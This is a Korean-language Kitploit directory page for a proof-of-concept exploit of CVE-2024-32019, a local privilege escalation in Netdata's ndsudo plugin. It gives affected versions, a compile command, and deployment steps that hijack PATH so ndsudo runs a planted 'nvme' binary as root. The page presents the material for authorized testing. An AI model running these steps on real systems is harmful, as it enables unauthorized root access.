Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
CVE-2024-32019-POC — CVE-2024-32019에 대한 개념 증명 익스플로잇으로, Netdata의 ndsudo 플러그인에서 신뢰할 수 없는 검색 경로를 통한 로컬 권한 상승을 시연합니다. 컴파일 지침 및 배포 단계를 포함합니다. | Kitploit
도구/GitHubGitHub/alielkhatteb/cve-2024-32019-poc
Privilege EscalationExploitationPenetration TestingLearning & EducationBinary Exploitation
GitHubalielkhatteb/cve-2024-32019-poc

CVE-2024-32019-POC

CVE-2024-32019에 대한 개념 증명 익스플로잇으로, Netdata의 ndsudo 플러그인에서 신뢰할 수 없는 검색 경로를 통한 로컬 권한 상승을 시연합니다. 컴파일 지침 및 배포 단계를 포함합니다.

저장소 보기
521년 전아직 검토되지 않음

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

⚠️ CVE-2024-32019 - PoC

📌 영향을 받는 버전

  • >= v1.45.0, < v1.45.3
  • >= v1.44.0-60, < v1.45.0-169

🛠️ 개념 증명

CVE-2024-32019 — ndsudo의 신뢰할 수 없는 검색 경로를 통한 로컬 권한 상승

🔧 익스플로잇 컴파일

root@kitploit:~
x86_64-linux-gnu-gcc -o nvme exploit.c -static

📤 대상 머신에 배포

  1. 컴파일된 바이너리를 취약한 머신으로 전송하세요.

  2. 실행 가능하게 만드세요:

    root@kitploit:~
    chmod +x nvme
    
  3. PATH 조작을 통해 취약한 바이너리를 익스플로잇하세요 (바이너리를 업로드한 동일한 경로 사용):

    root@kitploit:~
    PATH=$(pwd):$PATH /opt/netdata/usr/libexec/netdata/plugins.d/ndsudo nvme-list
    

🔍 참고 자료

  • Netdata 보안 권고 - GHSA-pmhq-4cxq-wj93

⚖️ 면책 조항 및 조건

이 개념 증명(PoC) 코드는 교육 및 승인된 침투 테스트 목적으로만 제공됩니다.

  • 어떠한 허가도 수정, 재배포 또는 다른 목적으로 이 코드를 사용하는 것에 대해 부여되지 않습니다.
  • 무단 사용 또는 수정은 불법적이고 비윤리적일 수 있습니다.
  • 저자는 오용이나 손해에 대해 책임을 지지 않습니다.
도구 다운로드